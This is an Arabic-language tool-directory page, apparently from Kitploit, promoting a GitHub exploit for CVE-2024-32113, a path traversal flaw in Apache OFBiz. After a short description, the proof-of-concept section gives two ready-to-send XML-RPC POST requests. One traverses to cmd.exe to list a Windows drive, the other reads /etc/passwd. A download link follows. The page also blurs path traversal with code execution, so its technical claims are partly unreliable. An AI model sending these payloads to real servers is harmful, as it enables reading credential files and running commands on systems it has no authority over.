Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Apache-OFBiz-Directory-Traversal-exploit — أداة استغلال لثغرة CVE-2024-32113 في Apache OFBiz عبر اجتياز المسار من خلال طلبات XML-RPC مُعدّة خصيصًا، مما يتيح قراءة ملفات اعتباطية وإمكانية تنفيذ أوامر على الخوادم المعرضة للخطر. | Kitploit
أدوات/GitHubGitHub/absholi7ly/apache-ofbiz-directory-traversal-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتأمن الويباختبار الاختراق
GitHubabsholi7ly/apache-ofbiz-directory-traversal-exploit

Apache-OFBiz-Directory-Traversal-exploit

أداة استغلال لثغرة CVE-2024-32113 في Apache OFBiz عبر اجتياز المسار من خلال طلبات XML-RPC مُعدّة خصيصًا، مما يتيح قراءة ملفات اعتباطية وإمكانية تنفيذ أوامر على الخوادم المعرضة للخطر.

عرض المستودع
1634منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Apache-OFBiz-Directory-Traversal-exploit

تم اكتشاف ثغرة أمنية مصنفة على أنها حرجة (Critical) في Apache OFBiz حتى الإصدار 18.12.12. تتأثر بهذه المشكلة وظيفة غير معروفة. يؤدي التلاعب بمدخل غير معروف إلى ثغرة اجتياز المسار (Path Traversal). يستخدم المنتج مدخلات خارجية لإنشاء اسم مسار (Pathname) يهدف إلى تحديد ملف أو دليل يقع تحت دليل أصلي مقيد، لكنه لا يحيد بشكل صحيح العناصر الخاصة داخل اسم المسار التي قد تتسبب في حل اسم المسار إلى موقع خارج الدليل المقيد. تتأثر كل من السرية (Confidentiality) والسلامة (Integrity) والتوفر (Availability).

مقدمة

  • تسمح الثغرة الأمنية CVE-2024-32113 بتنفيذ تعليمات برمجية عشوائية على خادم Apache OFBiz عن طريق إرسال طلب HTTP مصمم خصيصًا.
  • في هذا الطلب، يستخدم المهاجم المعامل ../../../../../../etc/passwd للإشارة إلى ملف etc/passwd على خادم Apache OFBiz.
  • عندما يعالج خادم Apache OFBiz هذا الطلب، سيحاول قراءة ملف etc/passwd، الذي يحتوي على معلومات حساسة حول مستخدمي الخادم.
  • يمكن استخدام هذه المعلومات لتنفيذ المزيد من الهجمات على الخادم، مثل سرقة البيانات أو تعديلها أو حتى حذفها.

إثبات المفهوم

1-

root@kitploit:~
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>performCommand</methodName>
  <params>
    <param>
      <value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
    </param>
  </params>
</methodCall>

أو

2-

root@kitploit:~
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>example.createBlogPost</methodName>
  <params>
    <param>
      <value><string>../../../../../../etc/passwd</string></value>
    </param>
  </params>
</methodCall>
تنزيل الأداة